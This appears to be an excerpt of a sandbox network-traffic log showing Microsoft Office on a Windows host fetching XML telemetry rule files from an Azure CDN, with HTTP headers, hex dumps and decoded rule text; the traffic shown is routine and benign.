                                                                                                                                                                                                                                                    x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120831Z-16849878b78fssff8btnns3b1400000006t0000000008a0q
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    76192.168.2.54980313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                    x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120831Z-16849878b78wc6ln1zsrz6q9w8000000065000000000a4ks
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    77192.168.2.54980513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:32 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                    x-ms-request-id: ad4459d7-101e-007a-6a4c-27047e000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120832Z-16849878b78fkwcjkpn19c5dsn00000005h0000000007nr0
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    78192.168.2.54980613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:32 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                    x-ms-request-id: d9732123-901e-007b-1098-25ac50000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120832Z-16849878b78hh85qc40uyr8sc800000006pg00000000g316
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    79192.168.2.54980413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:32 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                    x-ms-request-id: 4814b401-401e-005b-1e73-279c0c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120832Z-17c5cb586f6lxnvg801rcb3n8n000000068g000000009vk8
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    80192.168.2.54980713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:32 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                    x-ms-request-id: 933aac65-d01e-007a-51aa-26f38c000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120832Z-16849878b78g2m84h2v9sta29000000005gg0000000016d9
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    81192.168.2.54980813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:32 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 432
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                    x-ms-request-id: f491e318-501e-008f-212c-289054000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120832Z-r197bdfb6b46krmwag4tzr9x7c00000006c0000000002a6p
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:32 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    82192.168.2.54981113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                    x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120833Z-16849878b78fkwcjkpn19c5dsn00000005dg00000000g7f4
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    83192.168.2.54981013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                    x-ms-request-id: cce6b4d6-601e-000d-171c-292618000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120833Z-r197bdfb6b4qbfppwgs4nqza800000000560000000002ypg
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    84192.168.2.54981213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                    x-ms-request-id: df439d9f-401e-0067-5610-2709c2000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120833Z-16849878b78g2m84h2v9sta29000000005eg000000005tfd
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
